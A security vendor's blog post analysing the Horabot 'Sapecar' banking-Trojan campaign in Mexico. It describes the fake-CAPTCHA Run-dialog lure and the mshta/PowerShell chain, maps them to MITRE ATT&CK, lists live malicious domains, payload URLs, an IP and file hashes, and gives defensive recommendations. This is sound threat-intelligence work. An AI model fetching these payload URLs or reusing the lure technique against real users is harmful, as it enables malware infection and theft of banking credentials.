Unpacking the "Sapecar" Campaign: Technical Analysis of the Horabot Banking Trojan in Mexico

The threat landscape in Latin America continues to evolve with increasing complexity, as evidenced by a recent surge in activity surrounding Horabot. This multi-stage threat bundle—comprising a modular banking Trojan and an automated email spreader—has recently been observed targeting users in Mexico through a sophisticated "Sapecar" campaign.

At SecLookup, our mission is to provide proactive intelligence against emerging threats. Our threat intelligence platform was actively detecting and blocking the infrastructure associated with this campaign well before its public disclosure, ensuring our users remained protected against these deceptive tactics. In this post, we will break down the technical nuances of the attack chain, the threat actor's tactics, and the specific indicators identified during our analysis.

Executive Summary

The Horabot campaign, dubbed "Sapecar" by researchers at Kaspersky GReAT, represents a significant evolution in social engineering-based malware delivery. The campaign primarily targets Mexican financial institutions and their customers. The attack utilizes a deceptive "Fake CAPTCHA" lure that tricks users into executing malicious commands manually via the Windows Run dialog—a technique increasingly favored by modern stealers and bankers to bypass traditional browser-based security controls. Once executed, the infection chain deploys a PowerShell-based downloader that eventually leads to the installation of Horabot, a Trojan capable of stealing sensitive financial data and turning the victim's machine into a distribution node for further phishing campaigns.

Threat Analysis: The "Sapecar" Kill Chain

The Horabot attack chain is a masterclass in Living-off-the-Land (LotL) techniques combined with psychological manipulation. By leveraging legitimate Windows utilities, the adversary minimizes their file-based footprint and avoids triggering basic signature-based detection.

Stage 1: Social Engineering and the Fake CAPTCHA

The attack begins with a phishing email or a malicious redirection to a landing page designed to mimic a standard security verification screen. These pages are often hosted on newly registered domains such as evs.grupotuis[.]buzz.

Unlike traditional drive-by downloads, this campaign utilizes a "manual execution" lure. The page displays a fake CAPTCHA and instructs the user to:

1. Press Win + R to open the Windows Run dialog.

2. Paste a pre-copied malicious command (already in the user's clipboard via JavaScript).

3. Press Enter.

This tactic effectively bypasses many web-filtering and sandbox solutions because the malicious action is initiated by the user through a legitimate system component, rather than being directly downloaded or executed by the browser.

Stage 2: Execution via MSHTA and PowerShell

The command pasted into the Run dialog typically invokes mshta.exe, a legitimate Windows utility used to execute Microsoft HTML Applications (HTAs). The command points to a remote URL, such as https://evs.grupotuis[.]buzz/0capcha17/, which serves a malicious script.

This script initiates a PowerShell sequence that performs environment checks, establishes persistence, and downloads the next stage of the malware. The use of mshta.exe is a classic MITRE ATT&CK technique (T1218.005) used to proxy the execution of malicious code through a trusted binary.

Stage 3: The Horabot Payload

The final payload is a sophisticated banking Trojan designed specifically for the Mexican market. Its primary capabilities include:

• Credential Harvesting: Intercepting login credentials for online banking portals.

• Form Grabbing: Capturing data entered into web forms.

• Email Spreading: Accessing the victim's Outlook or webmail to send out further phishing lures to contacts, facilitating lateral movement across organizations and social circles.

• Remote Access: Providing the attacker with a backdoor to the infected system.

The "Sapecar" campaign is notable for its use of diverse infrastructure, including domains like aufal.filevexcasv[.]buzz and cgf.midasx[.]site, which were used for command-and-control (C2) and payload delivery.

MITRE ATT&CK Mapping

Tactic	Technique	ID
Initial Access	Phishing: Malicious Link	T1566.002
Execution	User Execution: Malicious Link	T1204.001
Execution	Signed Binary Proxy Execution: Mshta	T1218.005
Execution	Command and Scripting Interpreter: PowerShell	T1059.001
Persistence	Boot or Logon Autostart Execution: Registry Run Keys	T1547.001
Defense Evasion	Obfuscated Files or Information	T1027
Exfiltration	Exfiltration Over C2 Channel	T1041

SecLookup Detection

The SecLookup threat intelligence platform proactively identified the infrastructure used in this Horabot campaign. Our systems flagged the following domains as malicious based on their registration patterns, hosting providers, and association with known malware distribution scripts:

• aufal.filevexcasv[.]buzz

• cgf.midasx[.]site

• thea.gruposhac[.]space

• labodeguitaup[.]space

• cfg.brasilinst[.]site

• lifenews[.]pro

Indicators of Compromise (IOCs)

Malicious Domains

aufal.filevexcasv.buzz
cgf.midasx.site
thea.gruposhac.space
labodeguitaup.space
cfg.brasilinst.site
lifenews.pro
grupotuis.buzz
midasx.site
gruposhac.lat
facturastbs.shop
brasilinst.site

IP Addresses

64.177.80.44

File Hashes (MD5)

c882d948d44a65019df54b0b2996677f
6272ef6ac1de8fb4bdd4a760be7ba5ed
4caa797130b5f7116f11c0b48013e430

Malicious URLs

https://evs.grupotuis.buzz/0capcha17/DMEENLIGGB/GRXUOIWCEKVX
https://thea.gruposhac.space/0out0408
https://cgf.facturastbs.shop/0725/a/home
https://cfg.brasilinst.site/a/br/logs/index.php?CHLG
https://aufal.filevexcasv.buzz/on7all/index15.php
https://pdj.gruposhac.lat/g1/gerador.php
https://pdj.gruposhac.lat/g1/
https://pdj.gruposhac.lat/g1/auxld1
https://upstar.pics/a/08/150822/up/up
https://labodeguitaup.space/a/08/150822/au/au

Recommendations

To defend against Horabot and similar social engineering-led campaigns, SecLookup recommends the following actions:

1. Block LOLBAS Execution: Restrict the execution of mshta.exe, powershell.exe, and cmd.exe for standard users where not operationally required. Monitor for mshta.exe making external network connections.

2. User Awareness Training: Educate employees on the dangers of the Windows Run dialog (Win+R). Emphasize that legitimate websites—especially security verification pages—will never ask a user to paste commands into the Run dialog.

3. Endpoint Monitoring: Deploy EDR solutions to alert on suspicious parent-child process relationships, such as a web browser or the Run dialog launching mshta.exe.

4. Implement DNS Filtering: Use a threat intelligence-driven DNS filtering service to block access to known malicious domains like those identified in the Horabot infrastructure.

5. Audit Clipboard Operations: While difficult to implement at scale, security teams should be aware that web-based "copy-to-clipboard" events are being weaponized.

References

• The SOC Files: Time to “Sapecar”. Unpacking a new Horabot campaign in Mexico by Domenico Caldarella, Mateus Salgado, Securelist (Kaspersky GReAT)